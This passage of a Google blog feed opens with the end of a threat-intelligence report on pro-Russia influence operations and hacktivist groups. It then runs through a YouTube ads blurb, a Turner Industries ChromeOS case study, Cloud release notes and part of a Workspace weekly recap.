&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The self-proclaimed hacktivist group NoName057(16) emerged following the Russian invasion of Ukraine in 2022, primarily targeting Ukraine and its partners and allies with DDoS attacks and various network intrusions. It has targeted high profile events, such as the Milano Cortina Winter Olympics, institutions like the French National Assembly, and critical infrastructure and transportation targets in Germany. Often their messaging cites grievances with overt acts of Western support for Kyiv, suggesting the group advances Russian interests not only through the targeting of perceived Russian adversaries but also in gaining attention for its pro-Russia messaging. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Established ecosystem components facilitate the cultivation of new assets and activity. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Inter-ecosystem cross-promotion helps overcome challenges of audience building by directing traffic toward &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/information-operations-2022-midterm-elections/"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;new assets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, operations, and narratives, enabling rapid deployment of new and existing IO capabilities. This directly supports a self-sustaining cycle that maintains and expands the ecosystem. &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The hacktivist persona JokerDNR played a significant role in amplifying the APT44-linked persona Solntsepek when its doxxing-focused Telegram channel first launched and then again as it began claiming cyber espionage activity. &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Domestic Russian audiences are a longstanding target of the pro-Russia influence ecosystem. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Internally directed &lt;/span&gt;&lt;a href="https://blog.google/threat-analysis-group/prigozhin-interests-and-russian-information-operations/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;influence activity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; has often involved the promotion of Kremlin policies and talking points and the denigration of opposition voices and ideas, conducted by both overt and covert segments of the ecosystem.&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Ahead of Russia’s March 2024 presidential election, GTIG identified the hybrid espionage and influence actor UNC5101 register domains and conduct associated influence operations attempting to deceive Russian opposition voters about the timing of an anti-Putin protest.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Ecosystem actors respond to the same set of internal shifting circumstances and external geopolitical developments&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;, often leading to seemingly similar, but ultimately distinct, activity. &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;These shared drivers and general motivational alignments encourage actors to "spontaneously" coalesce around a particular topic or narrative. While this can appear superficially similar, this phenomenon is distinct from instances of actor coordination and campaign linkages, which is less common. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Systemic flexibility is a central feature, &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;with influence assets able to mobilize both incrementally and at scale to advance Russian interests. The Russian Government is able to &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/information-operations-surrounding-ukraine"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;mobilize assets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; across the ecosystem to respond to strategic events. Meanwhile, individual or aligned actors can separately mobilize to address &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/pro-russia-information-operations-drone-incursions"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;tactical needs&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, allowing the ecosystem to concurrently message on multiple issues across different geographies (Figure 7). &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Russia demonstrated its ability to focus the ecosystem on a single strategic issue like the Russian invasion of Ukraine. Simultaneously, discrete assets have addressed tactical events, such as when Portal Kombat briefly &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/pro-russia-information-operations-drone-incursions"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;promoted&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; narratives about a Russian drone incursion into Poland concurrently with other covert pro-Russia influence activity.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Tactical responses are executed by individual or coordinated/aligned clusters of actors to address emerging developments" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russia-io-fig7.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 7: Tactical responses are executed by individual or coordinated/aligned clusters of actors to address emerging developments&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Overt Russian media contributes to, and is connected with, multiple covert influence components. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;The overt components of Russia's influence infrastructure play a critical role within the broader Russian influence ecosystem beyond the commonly understood function of providing a public platform for government-aligned narratives and official talking points; overt media helps to drive (inform targeting) and amplify covert pro-Russia influence activity, seeding desirable narratives within the ecosystem and providing an indirect conduit between the Kremlin and a disparate array of influence actors. Overt media outlets have directly &lt;/span&gt;&lt;a href="https://home.treasury.gov/news/press-releases/jy2559" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;coordinated&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; their activity with covert actors and have increasingly employed IO tactics to disseminate their own content in the face of sanctions and platform bans (Figure 8). &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;US Government &lt;/span&gt;&lt;a href="https://home.treasury.gov/news/press-releases/jy2559" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;sanctions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; in late 2024 indicated that Russian state media company Russia Today (RT) directly conducted covert influence operations, including on behalf of the Russian intelligence services. Further, RT employees reportedly interacted with members of the self-proclaimed hacktivist group RaHDit, which has claimed to collaborate with multiple other pro-Russia hacktivist groups, illustrating the layered connections between overt media, Russian intelligence services, and hacktivist groups.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Overt Russian media maintains multiple links with the covert segments of the ecosystem" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russia-io-fig8.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 8: Overt Russian media maintains multiple links with the covert segments of the ecosystem&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Outsourcing IO capability development and campaign execution to third-party organizations and proxies enables scaling and obfuscation. &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Outsourcing is used for developing &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/cyber-operations-russian-vulkan"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;custom tooling&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and bolstering both human and &lt;/span&gt;&lt;a href="https://home.treasury.gov/news/press-releases/jy2559" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;organizational&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://home.treasury.gov/news/press-releases/jy2195" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;capacity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. While &lt;/span&gt;&lt;a href="https://www.justice.gov/opa/pr/justice-department-announces-actions-combat-two-russian-state-sponsored-cyber-criminal" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;custom tool&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; development facilitates operators in all phases of the IO lifecycle, Russian government actors can flexibly leverage different models for outsourcing campaign execution based on their specific needs. Proxy actors can also generate plausible deniability (Figure 9). &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;GTIG &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/cyber-operations-russian-vulkan"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;reported&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; how Russian IT contractor NTC Vulkan (Russian: НТЦ Вулкан) worked with the Russian intelligence services, including providing tooling and support for the GRU unit that sponsors APT44 activity. Separately, US government &lt;/span&gt;&lt;a href="https://home.treasury.gov/news/press-releases/jy2195" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;sanctions&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; detailed how the Doppelganger campaign is supported by multiple Russian contractors under the sponsorship of the Russian Presidential Administration.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Outsourcing and proxies support capability development and campaign execution for covert influence activity" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/russia-io-fig9.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 9: Outsourcing and proxies support capability development and campaign execution for covert influence activity&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Conclusion&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Multiple factors are propelling the evolution of the pro-Russia influence ecosystem we have observed since Moscow’s full scale invasion of Ukraine four years ago. The Kremlin mobilized the entire ecosystem to support the ongoing conflict, which has provided rapid feedback and driven significant investment in new and established overt and covert influence assets. At the same time, pro-Russia actors are increasingly experimenting with generative AI to enhance their workflows. This condensed period of adaptation, alongside signals suggesting Russia's growing reliance on IO tactics to navigate new challenges, raises concerns regarding how a potentially diversifying pool of actors will leverage advancements in tradecraft and scalability. As Russia seeks to emerge from international isolation and reorients its influence ecosystem back toward global objectives, it is critical for defenders to understand how this ecosystem provides the Kremlin with a durable influence capability in order to better anticipate future Russian influence threats.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Additional Tools and Resources&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For mitigation and hardening recommendations, please review the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/understand-action-intelligence-information-operations"&gt;How to Understand and Action Mandiant's Intelligence on Information Operations&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/preparation-hardening-destructive-attacks"&gt;Proactive Preparation and Hardening to Protect Against Destructive Attacks&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://services.google.com/fh/files/misc/linux-endpoint-hardening-wp-en.pdf" rel="noopener" target="_blank"&gt;Linux Endpoint Hardening to Protect Against Malware and Destructive Attacks&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;a href="https://services.google.com/fh/files/misc/ddos-protection-recommendations-wp-en.pdf" rel="noopener" target="_blank"&gt;Distributed Denial of Service (DDoS) Protection Recommendations&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google offers a suite of free of cost tools to help protect high-risk users from the most pervasive digital attacks, to which politicians, journalists, and campaigns are often most vulnerable. Examples include protecting accounts from targeted attacks with &lt;/span&gt;&lt;a href="https://landing.google.com/advancedprotection/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Advanced Protection Program&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and safeguarding campaign websites from DDoS attacks with &lt;/span&gt;&lt;a href="https://projectshield.withgoogle.com/landing" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Project Shield&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/topics/threat-intelligence/pro-russia-influence-ecosystem" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-29T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products/ads-commerce/youtube-brand-campaign-updates</id>
    <title>Unlock deeper insights for YouTube brand campaigns.</title>
    <updated>2026-06-29T14:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Logo_socialshare.max-600x600.format-webp.webp" /&gt;New features will help prove how YouTube brand campaigns are driving the results advertisers care about.</content>
    <link href="https://blog.google/products/ads-commerce/youtube-brand-campaign-updates" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-29T14:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/products/chrome-enterprise/turner-industries-blueprint-for-a-secure-cloud-first-infrastructure</id>
    <title>Turner Industries’ Blueprint for a Secure, Cloud-First Infrastructure</title>
    <updated>2026-06-29T09:16:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph"&gt;&lt;p&gt;&lt;i&gt;Editor’s note: Today’s post is by Scott Gatreau, Director of Information Security, at Turner Industries, a privately owned industrial contractor that provides construction, maintenance, and fabrication services. To streamline their one-stop shop service model and support their mission to reduce costs and increase efficiency, Tuner Industries turned to ChromeOS, Google Workspace, Chrome Enterprise Premium and Cameyo. This integrated tech stack provides the secure, efficient foundation necessary for continued growth.&lt;/i&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;Snapshot: _____________________________________________________________________________________________&lt;/b&gt;&lt;/p&gt;&lt;p&gt;To streamline their one-stop shop service model and support their goal of reducing costs and increasing efficiency, Tuner Industries turned to &lt;a href="https://chromeos.google/" target="_blank"&gt;ChromeOS&lt;/a&gt;, &lt;a href="https://workspace.google.com/lp/business/?utm_source=google&amp;amp;utm_medium=cpc&amp;amp;utm_campaign=1713742-Workspace-DR-NA-US-en-Google-BKWS-EXA-na&amp;amp;utm_content=c-Hybrid+%7C+BKWS+-+EXA+%7C+Txt-Google+Workspace-Core-149788617992&amp;amp;utm_term=google%20workspace&amp;amp;gclsrc=aw.ds&amp;amp;gad_source=1&amp;amp;gad_campaignid=20159848966&amp;amp;gclid=CjwKCAjwuuPRBhAnEiwA2Ji8etwtfxrNC-YaQY7MSEoVzemSZHS3EMC0XHR5dclO1FmTd0Ame6nCYBoCv7YQAvD_BwE" target="_blank"&gt;Google Workspace&lt;/a&gt;, &lt;a href="https://chromeenterprise.google/products/chrome-enterprise-premium/" target="_blank"&gt;Chrome Enterprise Premium&lt;/a&gt;, and &lt;a href="https://cameyo.google/" target="_blank"&gt;Cameyo&lt;/a&gt;. This integrated tech stack provides the secure, efficient foundation necessary for continued growth.&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Turner Industries deployed Chromebooks and reduced their cost-per-device by 40-50% compared to previous hardware and improved device longevity by 100-125%&lt;/li&gt;&lt;li&gt;Saved $700,000 across 1,200 devices&lt;/li&gt;&lt;li&gt;Reduced device configuration and deployment time from hours to minutes, saving an estimated 1,750 hours annually&lt;/li&gt;&lt;li&gt;Adopted Google Workspace and Chrome Enterprise Premium for 21k employees&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;b&gt;_____________________________________________________________________________________________&lt;/b&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph"&gt;&lt;p&gt;For over six decades, Turner Industries has been a cornerstone of the industrial contracting sector, committed to efficiency and operational excellence. Our tech optimization began approximately two and a half years ago with a decisive pivot to &lt;a href="https://workspace.google.com/lp/business/?utm_source=google&amp;amp;utm_medium=cpc&amp;amp;utm_campaign=1713742-Workspace-DR-NA-US-en-Google-BKWS-EXA-na&amp;amp;utm_content=c-Hybrid+%7C+BKWS+-+EXA+%7C+Txt-Google+Workspace-Core-149788617992&amp;amp;utm_term=google%20workspace&amp;amp;gclsrc=aw.ds&amp;amp;gad_source=1&amp;amp;gad_campaignid=20159848966&amp;amp;gclid=CjwKCAjwuuPRBhAnEiwA2Ji8etwtfxrNC-YaQY7MSEoVzemSZHS3EMC0XHR5dclO1FmTd0Ame6nCYBoCv7YQAvD_BwE" target="_blank"&gt;Google Workspace&lt;/a&gt; to upgrade our productivity tools. However, we hadn’t fully tapped into its potential until we deployed &lt;a href="https://chromeos.google/" target="_blank"&gt;ChromeOS&lt;/a&gt;, &lt;a href="https://chromeenterprise.google/products/chrome-enterprise-premium/" target="_blank"&gt;Chrome Enterprise Premium&lt;/a&gt;, and &lt;a href="https://cameyo.google/" target="_blank"&gt;Cameyo&lt;/a&gt;. This shift completely reshaped our infrastructure, and helped us boost our security, and deliver significant cost savings.&lt;/p&gt;&lt;p&gt;Adopting tools from Google’s enterprise ecosystem was a strategic choice driven by clear economic and operational needs. Cost was a factor since the purchase price is lower than traditional business devices, but they also offer greater longevity. We anticipate eight to ten years from our Chromebooks, which is a 100% to 125% increase in device longevity compared to previous options, thereby reducing our refresh cycles. This extended lifecycle, coupled with the immediate savings on software, like eliminating multiple antivirus licenses, built a robust case for long-term cost reduction. We also saw a reduction in IT support and maintenance costs. In total, the cost per device is 40-50% less than our previous hardware, totaling $700,000 in savings across 1,200 devices. Beyond the savings on new hardware, we can use ChromeOS Flex to convert our existing devices, offering an additional $600,000 in savings.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Opportunity for more strategic work due to saved time&lt;/b&gt;&lt;/p&gt;&lt;p&gt;Not only are we saving money, but we are also saving time. With ChromeOS, the time to deploy is now measured in minutes rather than the hours previously required to image and configure our previous machines, saving our team an estimated 1,750 hours annually. Furthermore, the inherent security and self-managing nature of ChromeOS minimizes the time my team spends on patching, installing applications, and handling routine security tickets, freeing up resources for higher-value strategic work.&lt;/p&gt;&lt;p&gt;The move to ChromeOS also created synergy with our established Google Workspace environment creating a fluid, modern working experience for our 21,000 employees.&lt;/p&gt;&lt;p&gt;We can also manage all endpoints using Chrome Enterprise Premium, enforcing critical security policies like Data Loss Prevention (DLP) across the Chrome browser, regardless of the device type. While our frontline teams are experts in their fields, their focus is on productivity rather than cybersecurity. The sandboxed environment ensures that even if a worker inadvertently downloads a malicious file, malware cannot execute or compromise the system allowing our team to focus on their work without risk.&lt;/p&gt;&lt;p&gt;Cameyo solved our challenge of accessing legacy Windows applications. Historically, as an industrial contractor operating at hundreds of client job sites, we relied heavily on a different VDI solution to allow field workers to securely access our network and applications, often over guest Wi-Fi. By completely replacing our legacy architecture with Cameyo, we gained a more stable, simpler, and cloud-native virtualization platform that is easier to manage.&lt;/p&gt;&lt;p&gt;ChromeOS is now utilized across nearly every discipline at Turner Industries, from frontline employees and sales teams to our executive leadership. Our CEO, COO, and CIO are all dedicated ChromeOS users. Our COO, historically a heavy Excel user who many thought would never switch was one of the first adopters and has since fully embraced Google Sheets. They believe in leading by example and they rely on ChromeOS for its simplicity and speed. Furthermore, the familiarity of ChromeOS for younger employees, who used it throughout their education, eliminates the learning curve and leads to instant productivity upon hiring.&lt;/p&gt;&lt;p&gt;Embedding Google’s ecosystem into the heart of Turner Industries’ IT strategy has yielded a transformation that is simultaneously structural, financial, and cultural. We have moved beyond the complex, costly, and resource-intensive architecture of the past to embrace a stack defined by simplicity, intrinsic security, and operational efficiency. For an organization of our scale, this modernization effort has established a new standard for how industrial excellence is supported by technology, confirming that a centralized, secure, and modern cloud-first infrastructure is the architecture for the future.&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;/div&gt;</content>
    <link href="https://cloud.google.com/blog/products/chrome-enterprise/turner-industries-blueprint-for-a-secure-cloud-first-infrastructure" rel="alternate"/>
    <category term="Google Cloud"/>
    <published>2026-06-29T09:16:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_29_2026</id>
    <title>Cloud Release Notes — June 29, 2026</title>
    <updated>2026-06-29T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;BigQuery&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can now grant data preparations and pipelines access to additional
services when running or scheduling them with user credentials
for a Google Account. You can grant &lt;a href="https://docs.cloud.google.com/bigquery/docs/orchestrate-data-preparations"&gt;data preparations access to Google Drive&lt;/a&gt;,
and &lt;a href="https://docs.cloud.google.com/bigquery/docs/schedule-pipelines"&gt;grant pipelines access to Google Drive, Bigtable, and Knowledge Catalog&lt;/a&gt;.
Extended access options are available in
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;
&lt;h2 class="release-note-product-title"&gt;Dataform&lt;/h2&gt;
&lt;h3&gt;Feature&lt;/h3&gt;
&lt;p&gt;You can grant workflows
&lt;a href="https://docs.cloud.google.com/dataform/docs/schedule-runs"&gt;access to Bigtable, Google Drive, and Knowledge Catalog&lt;/a&gt;
when running or scheduling them with your Google Account user credentials.
Extended access options are available in
&lt;a href="https://cloud.google.com/products#product-launch-stages"&gt;Preview&lt;/a&gt;.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_29_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-29T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_28_2026</id>
    <title>Cloud Release Notes — June 28, 2026</title>
    <updated>2026-06-28T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Remote Agents Version 2.6.7&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Remote Agents Version 2.6.7 is now available. This release contains minor bug
fixes.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_28_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-28T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://docs.cloud.google.com/release-notes#June_27_2026</id>
    <title>Cloud Release Notes — June 27, 2026</title>
    <updated>2026-06-27T07:00:00+00:00</updated>
    <content type="html">&lt;h2 class="release-note-product-title"&gt;Google SecOps SOAR&lt;/h2&gt;
&lt;h3&gt;Announcement&lt;/h3&gt;
&lt;p&gt;&lt;a href="https://docs.cloud.google.com/chronicle/docs/soar/release-notes#June_21_2026"&gt;Release 6.3.90&lt;/a&gt; is now
available for all regions.&lt;/p&gt;</content>
    <link href="https://docs.cloud.google.com/release-notes#June_27_2026" rel="alternate"/>
    <category term="Cloud Release Notes"/>
    <published>2026-06-27T07:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://workspaceupdates.googleblog.com/2026/06/weekly-recap-06-26-2026.html</id>
    <title>Google Workspace Weekly Recap - June 26, 2026</title>
    <updated>2026-06-26T18:52:29+00:00</updated>
    <content type="html">&lt;h3 style="text-align: left;"&gt;Troubleshoot formula errors quickly with Gemini in Google Sheets&lt;/h3&gt;&lt;div&gt;We’re excited to introduce a new Gemini in Sheets capability that enables you to diagnose and fix formula errors in one click. When you encounter a formula error, Gemini can analyze the surrounding data structure to help provide an easy-to-understand explanation of the core issue alongside a corrected version of the formula. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/troubleshoot-formula-errors-in-sheets.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Enhanced security monitoring with expanded Admin password reset alerts&lt;/h3&gt;&lt;div&gt;In Alert Center, we are expanding the existing “Super Admin password reset” alert into a broader Admin password reset alert.&amp;nbsp;With this update, the alert will now cover password resets for all administrator roles within your organization.&amp;nbsp;| &lt;a href="https://workspaceupdates.googleblog.com/2026/06/enhanced-security-monitoring-with-expanded-Admin-password-reset-alerts.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Join Google Meet calls from Safari on iOS devices&lt;/h3&gt;&lt;div&gt;Prior to this update, iOS users without the Gmail or Meet apps were unable to participate in Google Meet sessions on their mobile devices. Now, iOS mobile device users can join meetings directly through Safari, without needing to install an app. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/join-google-meet-calls-from-safari-on-iOS-devices.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Google Apps Script is now a Google Workspace core service with enterprise-grade data protection&lt;/h3&gt;&lt;div&gt;Google Apps Script is officially a Google Workspace core service. Covered under the Google Cloud Terms of Service and Google Workspace for Education Terms of Service, Apps Script now offers the same enterprise-grade data protection, robust administrative controls, and standard technical support that safeguards other core services. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/google-apps-script-workspace-core-service.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Connect to Google Meet hardware with room codes now in Early Preview&lt;/h3&gt;&lt;div&gt;Google Meet users can now connect to nearby conference room hardware by entering a 5-character room code on their personal device. Meet recently launched Connect Room using proximity-based detection to identify nearby hardware. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/room-codes-google-meet-hardware-early-preview.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Updates to Gemini in Google Classroom&lt;/h3&gt;&lt;div&gt;We are introducing several updates to the Gemini tab in Google Classroom designed to make its tools even more helpful for teachers. These changes make it easier for educators to collaborate with AI and create visual aids from any device, while expanding options for refining lesson plans. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/updates-to-gemini-in-google-classroom.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Stricter classifications for Google Groups to enhance data security and privacy&lt;/h3&gt;&lt;div&gt;Earlier this year, we announced changes to Google Groups to enhance data security and privacy. The changes, which are rolling out now. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/stricter-classifications-for-google-groups-to-enhance-data-security-and-privacy.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Read Along in Google Classroom is now available to all education users to support foundational literacy&lt;/h3&gt;&lt;div&gt;Read Along in Google Classroom, an AI-powered literacy tool that provides in-the-moment support to students as they read aloud, is now available to all Google Workspace for Education users at no cost. | &lt;a href="https://workspaceupdates.googleblog.com/2026/06/read-along-in-google-classroom-is-now-available-to-all-education-users-to-support-foundational-literacy.html" target="_blank"&gt;Learn more&lt;/a&gt;.&lt;/div&gt;&lt;h3 style="text-align: left;"&gt;Streamline your data backups with incremental exports for Google 